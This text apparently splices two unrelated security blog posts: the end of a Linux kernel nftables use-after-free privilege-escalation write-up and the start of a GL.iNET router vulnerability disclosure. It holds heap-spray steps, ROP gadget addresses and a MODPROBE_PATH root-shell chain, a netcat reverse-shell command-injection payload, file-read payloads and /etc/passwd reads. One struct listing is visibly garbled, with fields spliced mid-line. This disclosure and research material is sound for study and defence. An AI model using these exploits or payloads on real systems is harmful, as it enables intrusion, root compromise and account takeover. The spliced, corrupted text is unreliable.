     object.

The offsets mentioned above take into account the fact that 

nft_lookup
 and 
nft_dynset
 expressions are bundled in the 
data
 member of an 
nft_expr
 object (the data member is at offset 8).

In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the 

nft_lookup
 and 
nft_dynset
 expression objects that have an interesting member at the listed offsets.

As mentioned before, in Linux kernel 5.18.1 the 

nft_expr
 objects are allocated using the 
GFP_KERNEL_ACCOUNT
 flag, as shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nf_tables_api.c#L2866

static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
				      const struct nlattr *nla)
{
	struct nft_expr_info expr_info;
	struct nft_expr *expr;
	struct module *owner;
	int err;

	err = nf_tables_expr_parse(ctx, nla, &expr_info);
	if (err < 0)
            goto err1;
        err = -ENOMEM;

        expr = kzalloc(expr_info.ops->size, GFP_KERNEL_ACCOUNT);
	if (expr == NULL)
	    goto err2;

	err = nf_tables_newexpr(ctx, &expr_info, expr);
	if (err < 0)
            goto err3;

        return expr;
err3:
        kfree(expr);
err2:
        owner = expr_info.ops->type->owner;
	if (expr_info.ops->type->release_ops)
	    expr_info.ops->type->release_ops(expr_info.ops);

	module_put(owner);
err1:
	return ERR_PTR(err);
}

Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.

Exploit Strategy

The ultimate primitives we need to exploit this vulnerability are the following:

  • Memory leak primitive: Mainly to defeat KASLR.
  • RIP control primitive: To achieve kernel code execution and escalate privileges.

However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the 

nft_set
nft_lookup
 or the 
nft_dynset
 objects.

Partially freeing 

nft_lookup
 and 
nft_dynset
 objects can help with leaking pointers, while partially freeing an 
nft_set
 object can be pretty useful to craft a partial fake 
nft_set
 to achieve RIP control, since it has an 
ops
 member that points to a function table.

Therefore, the high-level exploitation strategy would be the following:

  1. Leak the kernel image base address.
  2. Leak a pointer to an 
    nft_set
     object.
  3. Obtain RIP control.
  4. Escalate privileges by overwriting the kernel’s 
    MODPROBE_PATH
     global variable.
  5. Return execution to userland and drop a root shell.

The following sub-sections describe how this can be achieved.

Partial Object Free Primitive

A partial object free primitive can be built by looking for a kernel object allocated with 

GFP_KERNEL_ACCOUNT
 within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed, 
kfree()
 has to be called on that pointer in order to partially free the targeted object.

One of such objects is the 

fdtable
 object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27

struct fdtable {
        unsigned int               max_fds;              /*     0     4 */

        /* XXX 4 bytes hole, try to pack */

        struct file * *            fd;                   /*     8     8 */
        long unsigned int *        close_on_exec;        /*    16     8 */
        long unsigned int *        open_fds;             /*    24     8 */
        long unsigned int *        full_fds_bits;        /*    32     8 */
        struct callback_head       rcu __attribute__((__aligned__(8))); /*    40    16 */

        /* size: 56, cachelines: 1, members: 6 */
        /* sum members: 52, holes: 1, sum holes: 4 */
        /* forced alignments: 1 */
        /* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

The size of an 

fdtable
 object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace 
nft_lookup
 objects. It has a member of interest at offset 24 (
open_fds
), which is a pointer to an unsigned long integer array. The allocation of 
fdtable
 objects is done by the kernel function 
alloc_fdtable()
, which can be reached with the following call stack.

alloc_fdtable()
 |  
 +- dup_fd()
    |
    +- copy_files()
      |
      +- copy_process()
        |
        +- kernel_clone()
          |
          +- fork() syscall

Therefore, by calling the 

fork()
 system call the current process is copied and thus the currently open files. This is done by allocating a new file descriptor table object (
fdtable
), if required, and copying the currently open file descriptors to it. The allocation of a new 
fdtable
 object only happens when the number of open file descriptors exceeds 
NR_OPEN_DEFAULT
, which is defined as 64 on 64-bit machines. The following listing shows this check.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L316

/*
 * Allocate a new files structure and copy contents from the
 * passed in files structure.
 * errorp will be valid only when the returned files_struct is NULL.
 */
struct files_struct *dup_fd(struct files_struct *oldf, unsigned int max_fds, int *errorp)
{
        struct files_struct *newf;
        struct file **old_fds, **new_fds;
        unsigned int open_files, i;
        struct fdtable *old_fdt, *new_fdt;

        *errorp = -ENOMEM;
        newf = kmem_cache_alloc(files_cachep, GFP_KERNEL);
        if (!newf)
                goto out;

        atomic_set(&newf->count, 1);

        spin_lock_init(&newf->file_lock);
        newf->resize_in_progress = false;
        init_waitqueue_head(&newf->resize_wait);
        newf->next_fd = 0;
        new_fdt = &newf->fdtab;

[1]

        new_fdt->max_fds = NR_OPEN_DEFAULT;
        new_fdt->close_on_exec = newf->close_on_exec_init;
        new_fdt->open_fds = newf->open_fds_init;
        new_fdt->full_fds_bits = newf->full_fds_bits_init;
        new_fdt->fd = &newf->fd_array[0];

        spin_lock(&oldf->file_lock);
        old_fdt = files_fdtable(oldf);
        open_files = sane_fdtable_size(old_fdt, max_fds);

        /*
         * Check whether we need to allocate a larger fd array and fd set.
         */

[2]

        while (unlikely(open_files > new_fdt->max_fds)) {
                spin_unlock(&oldf->file_lock);

                if (new_fdt != &newf->fdtab)
                        __free_fdtable(new_fdt);

[3]

                new_fdt = alloc_fdtable(open_files - 1);
                if (!new_fdt) {
                        *errorp = -ENOMEM;
                        goto out_release;
                }

[Truncated]

        }

[Truncated]

        return newf;

out_release:
        kmem_cache_free(files_cachep, newf);
out:
        return NULL;
}

At [1] the 

max_fds
 member of 
new_fdt
 is set to 
NR_OPEN_DEFAULT
. Afterwards, at [2] the loop executes only when the number of open files exceeds the 
max_fds
 value. If the loop executes, at [3] a new 
fdtable
 object is allocated via the 
alloc_fdtable()
 function.

Therefore, to force the allocation of 

fdtable
 objects in order to replace a given free object from kmalloc-cg-64 the following steps must be taken:

  1. Create more than 64 open file descriptors. This can be easily done by calling the 
    dup()
     function to duplicate an existing file descriptor, such as the 
    stdout
    . This step should be done before triggering the free of the object to be replaced with an 
    fdtable
     object, since the 
    dup()
     system call also ends up allocating 
    fdtable
     objects that can interfere.
  2. Once the target object has been freed, fork the current process a large number of times. Each 
    fork()
     execution creates one 
    fdtable
     object.

The free of the 

open_fds
 pointer is triggered when the 
fdtable
 object is destroyed in the 
__free_fdtable()
 function.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/fs/file.c#L34

static void __free_fdtable(struct fdtable *fdt)
{
        kvfree(fdt->fd);
        kvfree(fdt->open_fds);
        kfree(fdt);
}

Therefore, the partial free via the overwritten 

open_fds
 pointer can be triggered by simply terminating the child process that allocated the 
fdtable
 object.

Leaking Pointers

The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the 

msg_msg
structure, which is allocated in 
kmalloc-cg-*
 slab caches starting from kernel version 5.14.

The 

msg_msg
 structure acts as a header of System V messages that can be created via the userland 
msgsnd()
 function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/msg.h#L9

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.

It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the 

msg_msg
 header. This restriction discards the 
nft_lookup
 object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the 
msg_msg.m_ts
 member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the 
m_ts
 member is not negative when interpreted as a signed long integer and heap addresses start with 
0xffff
, making it a negative long integer. 

Leaking an 
nft_set
 Pointer

Leaking a pointer to an 

nft_set
 object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:

1. Create a target set where the expressions will be bound to.

2. Create a rule with a lookup expression bound to the target set from step 1.

3. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 24 so the one corrupted with the 
nft_set
 pointer can later be identified.

5. Remove the rule created, which will remove the entry of the 

nft_lookup
 expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target 
nft_set
 object where the original 
binding.list.prev
 member was (offset 72). Since the freed 
nft_dynset
 object was replaced by a System V message, the pointer to the 
nft_set
 will be written at offset 24 within the message data.

6. Use the userland 

msgrcv()
 function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the 
nft_set
.

Leaking a Kernel Function Pointer

Leaking a kernel pointer requires a bit more work than leaking a pointer to an 

nft_set
 object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using 
fdtable
 object already described. The steps followed to leak a pointer to a kernel function are the following.

1. Increase the number of open file descriptors by calling 

dup()
 on 
stdout
 65 times.

2. Create a target set where the expressions will be bound to (different from the one used in the `

nft_set
` adress leak).

3. Create a set with an embedded 

nft_lookup
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_lookup
 object will be freed but not removed from the target set bindings list, causing a UAF.

4. Spray 

fdtable
 objects in order to replace the freed 
nft_lookup
 from step 3.

5. Create a set with an embedded 

nft_dynset
 expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the 
nft_dynset
 object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the 
open_fds
 member of the 
fdtable
 object (allocated in step 4) that replaced the 
nft_lookup
 object.

6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed 

nft_dynset
 object (via 
msgsnd()
 function). Tag all the messages at offset 8 so the one corrupted can be identified.

7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the 

nft_dynset
 object, effectively causing a UAF to a part of a System V message.

8. Spray 

time_namespace
 objects in order to replace the partially freed System V message allocated in step 7. The reason for using the 
time_namespace
 objects is explained later.

9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use 

msgrcv()
 to read the data from it, which is overlapping with the newly allocated 
time_namespace
 object. The offset 40 of the data portion of the System V message corresponds to 
time_namespace.ns-&gt;ops
 member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.

10. Clean-up the child processes used to spray the 

time_namespace
 objects.

time_namespace
 objects are interesting because they contain an 
ns_common
 structure embedded in them, which in turn contains an 
ops
 member that points to a function table with functions defined within the kernel core. The 
time_namespace
 structure definition is listed below.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/time_namespace.h#L19

struct time_namespace {
        struct user_namespace *    user_ns;              /*     0     8 */
        struct ucounts *           ucounts;              /*     8     8 */
        struct ns_common           ns;                   /*    16    24 */
        struct timens_offsets      offsets;              /*    40    32 */
        /* --- cacheline 1 boundary (64 bytes) was 8 bytes ago --- */
        struct page *              vvar_page;            /*    72     8 */
        bool                       frozen_offsets;       /*    80     1 */

        /* size: 88, cachelines: 2, members: 6 */
        /* padding: 7 */
        /* last cacheline: 24 bytes */
};

At offset 16, the 

ns
 member is found. It is an 
ns_common
 structure, whose definition is the following.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/ns_common.h#L9

struct ns_common {
        atomic_long_t              stashed;              /*     0     8 */
        const struct proc_ns_operations  * ops;          /*     8     8 */
        unsigned int               inum;                 /*    16     4 */
        refcount_t                 count;                /*    20     4 */

        /* size: 24, cachelines: 1, members: 4 */
        /* last cacheline: 24 bytes */
};

At offset 8 within the 

ns_common
 structure the 
ops
 member is found. Therefore, 
time_namespace.ns-&gt;ops
 is at offset 24.

Spraying 

time_namespace
 objects can be done by calling the 
unshare()
 system call and providing the 
CLONE_NEWUSER
 and 
CLONE_NEWTIME
. In order to avoid altering the execution of the current process the 
unshare()
 executions can be done in separate processes created via 
fork()
.

clone_time_ns()
  |
  +- copy_time_ns()
    |
    +- create_new_namespaces()
      |
      +- unshare_nsproxy_namespaces()
        |
        +- unshare() syscall

The 

CLONE_NEWTIME
 flag is required because of a check in the function 
copy_time_ns()
 (listed below) and 
CLONE_NEWUSER
 is required to be able to use the 
CLONE_NEWTIME
 flag from an unprivileged user.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/kernel/time/namespace.c#L133

/**
 * copy_time_ns - Create timens_for_children from @old_ns
 * @flags:      Cloning flags
 * @user_ns:    User namespace which owns a new namespace.
 * @old_ns:     Namespace to clone
 *
 * If CLONE_NEWTIME specified in @flags, creates a new timens_for_children;
 * adds a refcounter to @old_ns otherwise.
 *
 * Return: timens_for_children namespace or ERR_PTR.
 */
struct time_namespace *copy_time_ns(unsigned long flags,
        struct user_namespace *user_ns, struct time_namespace *old_ns)
{
        if (!(flags & CLONE_NEWTIME))
                return get_time_ns(old_ns);

        return clone_time_ns(user_ns, old_ns);
}

RIP Control

Achieving RIP control is relatively easy with the partial object free primitive. This primitive can be used to partially free an 

nft_set
 object whose address is known and replace it with a fake 
nft_set
 object created with a System V message. The 
nft_set
 objects contain an 
ops
 member, which is a function table of type 
nft_set_ops
. Crafting this function table and triggering the right call will lead to RIP control.

The following is the definition of the 

nft_set_ops
 structure.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L389

struct nft_set_ops {
        bool                       (*lookup)(const struct net  *, const struct nft_set  *, const u32  *, const struct nft_set_ext  * *); /*     0     8 */
        bool                       (*update)(struct nft_set *, const u32  *, void * (*)(struct nft_set *, const struct nft_expr  *, struct nft_regs *), const struct nft_expr  *, struct nft_regs *, const struct nft_set_ext  * *); /*     8     8 */
        bool                       (*delete)(const struct nft_set  *, const u32  *); /*    16     8 */
        int                        (*insert)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, struct nft_set_ext * *); /*    24     8 */
        void                       (*activate)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    32     8 */
        void *                     (*deactivate)(const struct net  *, const struct nft_set  *, cstimate *); /*    88     8 */
        int                        (*init)(const struct nft_set  *, const struct nft_set_desc  *, const struct nlattr  * const *); /*    96     8 */
        void                       (*destroy)(const struct nft_set  *); /*   onst struct nft_set_elem  *); /*    40     8 */
        bool                       (*flush)(const struct net  *, const struct nft_set  *, void *); /*    48     8 */
        void                       (*remove)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *); /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        void                       (*walk)(const struct nft_ctx  *, struct nft_set *, struct nft_set_iter *); /*    64     8 */
        void *                     (*get)(const struct net  *, const struct nft_set  *, const struct nft_set_elem  *, unsigned int); /*    72     8 */
        u64                        (*privsize)(const struct nlattr  * const *, const struct nft_set_desc  *); /*    80     8 */
        bool                       (*estimate)(const struct nft_set_desc  *, u32, struct nft_set_e104     8 */
        void                       (*gc_init)(const struct nft_set  *); /*   112     8 */
        unsigned int               elemsize;             /*   120     4 */

        /* size: 128, cachelines: 2, members: 16 */
        /* padding: 4 */
};

The 

delete
 member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the 
nft
 command, a very simple one can be as follows:

nft add table inet test_dynset
nft add chain inet test_dynset my_input_chain { type filter hook input priority 0\;}
nft add set inet test_dynset my_set { type ipv4_addr\; }
nft add rule inet test_dynset my_input_chain ip saddr 127.0.0.1 delete @my_set { 127.0.0.1 }

The snippet above shows the creation of a table, a chain, and a set that contains elements of type 

ipv4_addr
 (i.e. IPv4 addresses). Then a rule is added, which deletes the item 
127.0.0.1
 from the set 
my_set
 when an incoming packet has the source IPv4 address 
127.0.0.1
. Whenever a packet matching that criteria is processed via nftables, the 
delete
 function pointer of the specified set is called.

Therefore, RIP control can be achieved with the following steps. Consider the target set to be the 

nft_set
 object whose address was already obtained.

  1. Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is 
    127.0.0.1
    .
  2. Partially free the 
    nft_set
     object from which the address was obtained.
  3. Spray System V messages containing a partially fake 
    nft_set
     object containing a fake 
    ops
     table, with a given value for the 
    ops-&gt;delete
     member.
  4. Trigger the call of 
    nft_set-&gt;ops-&gt;delete
     by locally sending a network packet to 
    127.0.0.1
    . This can be done by simply opening a TCP socket to 
    127.0.0.1
     at any port and issuing a 
    connect()
     call.

Escalating Privileges

Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.

A way of achieving this is as follows:

  1. Pivot the stack to a memory area under control. When the 
    delete
     function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an 
    immediate
     expression in the rule created to achieve RIP control.
  2. Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable, the stack is pivoted again to the end of the fake 
    nft_set
     used for RIP control.
  3. Build a ROP chain to overwrite the 
    MODPROBE_PATH
     global variable. Place it at the end of the 
    nft_set
     mentioned in step 2.
  4. Return to userland by using the KPTI trampoline.
  5. Drop to a privileged shell by leveraging the overwritten 
    MODPROBE_PATH
     global variable
    .

The stack pivot gadgets and ROP chain used can be found below.

// ROP gadget to pivot the stack to the nftables registers memory area

0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;


// ROP gadget to pivot the stack to the memory allocation holding the target nft_set

0xffffffff810b08f1: pop rsp ; ret ;

When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake 

nft_set
 object.

// ROP chain used to overwrite the MODPROBE_PATH global variable

0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;

It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.

Wrapping Up

We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.

We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router

Original text by Olivier Laflamme

I’ve really enjoyed reversing cheap/weird IoT devices in my free time. In early May of 2022, I went on an Amazon/AliExpress shopping spree and purchased ~15 cheap IoT devices. Among them was this mini portable router by GL.iNET.  

GL.iNET is a leading developer of OpenWrt Wi-Fi and IoT network solutions and to my knowledge is a Chinese company based out in Hong Kong & USA. They offer a wide variety of products, and the company’s official website is www.gl-inet.com. The GL-MT300N-V2 firmware version I dove into was 

V3.212
released on April 29th, 2022 for the Mango model. The goodcloud remote cloud management gateway was 
Version 1.00.220412.00
.

This blog will be separated into two sections. The first half contains software vulnerabilities, this includes the local web application and the remote cloud peripherals. The second mainly consists of an attempted hardware teardown.  

I like to give credit where credit is due. The GL.iNET team was really awesome to work & communicate with. They genuinely care about the security posture of their products. So I'd like to give some quick praise for being an awesome vendor that kept me in the loop throughout the patching/disclosure process.  

In terms of overall timeline/transparency, I started testing on-and-off between 

May 2nd 2022
 to 
June 15th 2022
. After reporting the initial command injection vulnerability GL.iNET asked if I were interested in monetary compensation to find additional bugs. We ultimately agreed to public disclosure & the release of this blog in exchange for continued testing. As a result, I was given safe passage and continued to act in good faith. Lastly, the GL.iNet also shipped me their (GL-AX1800 / Flint) for additional testing. GL.iNet does nothave a BBP or VDP program, I asked, and was given permission to perform the tests I did. In other words, think twice before poking at their infrastructure and being a nuisance.

Having vulnerabilities reported should never be seen as a defeat or failure. Development and security are intertwined in a never ending cycle. There will always be vulnerabilities in all products that take risks on creativity, innovation, and change - the essence of pioneering.

Vulnerabilities List

A total of 6 vulnerabilities were identified in GL.iNet routers and IoT cloud gateway peripheral web applications:

1. OS command injection on router & cloud gateway (CVE-2022-31898)
2. Arbitrary file read on router via cloud gateway (CVE-2022-42055)
3. PII data leakage via user enumeration leading to account takeover
4. Account takeover via stored cross-site scripting (CVE-2022-42054)
5. Account takeover via weak password requirements & lack of rate limiting
6. Password policy bypass leading to single character passwords 

Web Application 

OS Command Injection 

The MT300N-V2 portable router is affected by an OS Command Injection vulnerability that allows authenticated attackers to run arbitrary commands on the affected system as the application’s user. This vulnerability exists within the local web interface and remote cloud interface. This vulnerability stems from improper validation of input passed through the ping (

ping_addr
) and traceroute (
trace_addr
) parameters. The vulnerability affects ALL GL.iNET product’s firmware  
&gt;3.2.12
.

Fixed in firmware 

Version 3.215
 stable build 
SHA256: 8d761ac6a66598a5b197089e6502865f4fe248015532994d632f7b5757399fc7

Vulnerability Details

CVE ID: CVE-2022-31898
Access Vector: Remote/Adjacent
Security Risk: High
Vulnerability: CWE-78
CVSS Base Score: 8.4
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

I’ll run through the entire discovery process. There exists a file on disk 

/www/src/router/router.js
 which essentially manages the application panels. Think of it as the endpoint reference in charge of calling different features and functionality. As seen below, the path parameter points to the endpoint containing the router feature’s location on disk. When the endpoint such as 
/attools
 is fetched its respective 
.js
.html
, and 
.css
 files are loaded onto the page.

Through this endpoint, I quickly discovered that a lot of these panels were not actually accessible through the web UI’s sidebar seen below.

However, the functionality of these endpoints existed and were properly configured & referenced. Visually speaking, within the application they don’t have a sidebar «button» or action that can redirect us to it. 

Here is a full list of endpoints that can not be accessed through web UI actions.

http://192.168.8.1/#/ping    <-------- Vulnerable
http://192.168.8.1/#/apitest
http://192.168.8.1/#/attools
http://192.168.8.1/#/smessage
http://192.168.8.1/#/sendmsg
http://192.168.8.1/#/gps
http://192.168.8.1/#/cells
http://192.168.8.1/#/siderouter
http://192.168.8.1/#/rs485
http://192.168.8.1/#/adguardhome
http://192.168.8.1/#/sms
http://192.168.8.1/#/log
http://192.168.8.1/#/process
http://192.168.8.1/#/blelist
http://192.168.8.1/#/bluetooth

I should mention that some of these endpoints do become available after connecting modems, and other peripheral devices to the router. See the documentation for more details https://docs.gl-inet.com/.

As seen above, there exists a 

ping
 endpoint. From experience, these are always interesting. This endpoint has the ability to perform typical 
ping
 and 
traceroute
 commands. Let’s quickly confirm that these files exist, 
/ping
actions get called as defined within the 
router.js
 file.

root@GL-MT300N-V2:/www/src/temple/ping# pwd && ls /www/src/temple/ping index.CSS index.html index.js

The expected usage and output can be seen below.

What’s OS Command Injection? OS command injection is a fairly common vulnerability seen in such endpoints. Its typically exploited by using command operators ( 

|
 ,
&amp;&amp;
;
, etc,) that would allow you to execute multiple commands in succession, regardless of whether each previous command succeeds. 

Looking back at the ping portal, the UI (frontend) sanitizes the user-provided input against the following regex which is a very common implementation for validating IPv4 addresses.

Therefore, 

;
 isn’t an expected IPv4 schema character so when the 
pingIP()
check is performed, and any invalid characters will fail the request.

And we’re presented with the following error message.

We need to feed malicious content into the parameter 

pingValue
. If we do this successfully and don’t fail the check, our request will be sent to the web server where the server application act upon the input.

To circumvent the input sanitization on the front-end we will send our post request to the webserver directly using Burp Suite. This way we can simply modify the POST request without the front-end sanitization being forced. As mentioned above, using the 

;
 command separator we should be able to achieve command injection through the 
ping_addr
 or 
trace_addr
 parameters. If I’ve explained this poorly, perhaps the following visual can help.

Image Credit: I‘m on Your Phone, Listening – Attacking VoIP Configuration Interfaces

Let’s give it a try. If you look closely at the POST request below the 

ping_addr
value is 
;/bin/pwd%20
 which returned the present working directory of the application user. Confirming that OS Command Injection had been successfully performed.

Now let’s do an obligatory cat of 

/etc/passwd
 by feeding the following input 
;/bin/cat /etc/passwd 2>&amp;1

Okay, let’s go ahead and get a reverse shell.

Payload: 
;rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 192.168.8.193 4000 >/tmp/f

URL encoded:
;rm%20/tmp/f;mknod%20/tmp/f%20p;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|/usr/bin/nc%20192.168.8.193%204000%20>%20tmp%20f

Cool, but this attack scenario kinda sucks… we need to be authenticated, on the same network, etc, etc. One of the main reasons I think this is a cool find, and why it’s not simply a local attack vector is that we can configure our device with the vendor’s IoT cloud gateway! This cloud gateway allows us to deploy and manage our connected IoT gateways remotely.

I’ve discovered that there are roughly 

~30000
 devices configured this way. One of the features of this cloud management portal is the ability to access your device’s admin panel remotely through a public-facing endpoint. Such can be seen below.

As you may have guessed, command injection could be performed from this endpoint as well.

In theory, any attacker with the ability to hijack goodcloud.xyz user sessions or compromise a user account (both achieved in this blog) could potentially leverage this attack vector to gain a foothold on a network compromise. 

Additional things you can do:

Scan internal network:
GET /cgi-bin/api/repeater/scan

Obtain WiFi password of joined SSID's
GET /cgi-bin/api/repeater/manager/list

Obtain WiFi password of routers SSID's
GET /cgi-bin/api/ap/info 

Disclosure Timeline 

May 2, 2022: Initial discovery
May 2, 2020: Vendor contacted
May 3, 2022: Vulnerability reported to the vendor
May 10, 2022: Vulnerability confirmed by the vendor
July 6, 2022: CVE reserved
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


Arbitrary File Read

The MT300N-V2 portable router, configured along sides the vendor’s cloud management gateway (goodcloud.xyz) is vulnerable to Arbitrary File Read. The remote cloud gateway is intended to facilitate remote device access and management. This vulnerability exists within the cloud manager web interface and is only a feature available to enterprise users. The device editing interface tools harbors the 

ping
 and 
traceroute
 functionality which is vulnerable to a broken type of command injection whose behavior is limited to performing arbitrary file reads. Successful exploitation of this vulnerability will allow an attacker to access sensitive files and data on the router. It is possible to read any arbitrary files on the file system, including application source code, configuration, and other critical system files. 

Vulnerability Details

CVE ID: CVE-2022-42055
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-23 & CWE-25
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Enterprise users will have the 

TOOLS
 menu when editing their devices as seen below.

The 

ping_addr
 and 
trace_addr
 both allow you to read any file on disk when prepending 
;/bin/sh
 to the file you want to read.

I’m not sure why this happens. I have not been able to get regular command injection due to the way its calling 

ping
 and 
traceroute
 within busybox from what I assume is data passing through something similar to a ngrok tunnel. I can’t use funky delimiters or common escapes to simply comment out the rest of the operation. Anyhow, valid payloads would look like the following:

;bin/sh%20/<PATH_TO_FILE>

&bin/sh%20/<PATH_TO_FILE>

As a POC I’ve created a 

flag.txt
 file in 
/tmp
 on my router and I’m going to read it from the cloud gateway. I could just as easily read the 
passwd
 and 
shadow
 files. Successfully cracking them offline would allow me access to both the cloud ssh terminal, and the login UI.

Funny enough, this action can then be seen getting processed by the logs on the cloud gateway. So definitely not «OPSEC» friendly.

Disclosure Timeline 

May 25, 2022: Initial discovery
May 25, 2022: Vendor contacted & vulnerability reported
May 26, 2022: Vendor confirms vulnerability
July 7, 2022: Follow up with the vendor
October 13, 2022: Fixed in firmware 3.215


PII Data Leakage & User Enumeration 

The MT300N-V2 portable router has the ability to be configured along sides the vendor’s cloud management gateway (goodcloud.xyz) which allows for remote access and management.  This vulnerability exists within the cloud manager web interface through the device-sharing endpoint 

cloud-api/cloud/user/get-user?nameoremail=
 GET request.  Successful enumeration of a user will result in that user’s PII information being disclosed. At its core, this is a funky IDOR. The vulnerability affected the goodcloud.xyz prior to May, 12th 2022. 

Vulnerability Details

CVE ID: N/A
Access Vector: Network
Security Risk: Medium
Vulnerability: CWE-200 & CWE-203
CVSS Base Score: 6.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

I identified roughly  

~30,000
 users which were enumerated via their username or email address. Successful enumeration compromises the confidentiality of the user. This vulnerability returns sensitive information that could be leveraged by a sophisticated, and motivated attacker to compromise the user’s account credentials. 

This attack is performed after creating a regular 

goodcloud.xyz
 cloud gateway account and linking your GL.iNet device. In the image below we see that our device can be shared with another registered user.

The request and response for sharing a device with another user are seen below.

Performing this 

get-user
 request against an existing user will disclosure the following account information:

- company name
- account creation time
- credential's salt (string+MD5)
- account email
- account user ID
- last login time
- nickname
- password hash (MD5)
- phone number
- password salt (MD5)
- secret key
- security value (boolean)
- status value (boolean)
- account last updated time
- application user id
- username

The password appears to be MD5 HMAC but the actual formatting/order is unknown, and not something I deem necessary to figure out. That being said, given all the information retrieved from the disclosure I believe the chances of finding the right combination to be fairly high. Below is an example of how it could be retrieved.

Additionally, I discovered no rate-limiting mechanisms in place for sharing devices. Therefore, it’s relatively easy to enumerate a good majority of valid application users using Burp Suite intruder.

Another observation I made, which was not confirmed with the vendor (so is purely speculation) I noticed that not every user had a 

secret
 value associated with their account. I suspect that perhaps this secret code is actually leveraged for the 2FA QR code creation mechanism. The syntax would resemble something like this:

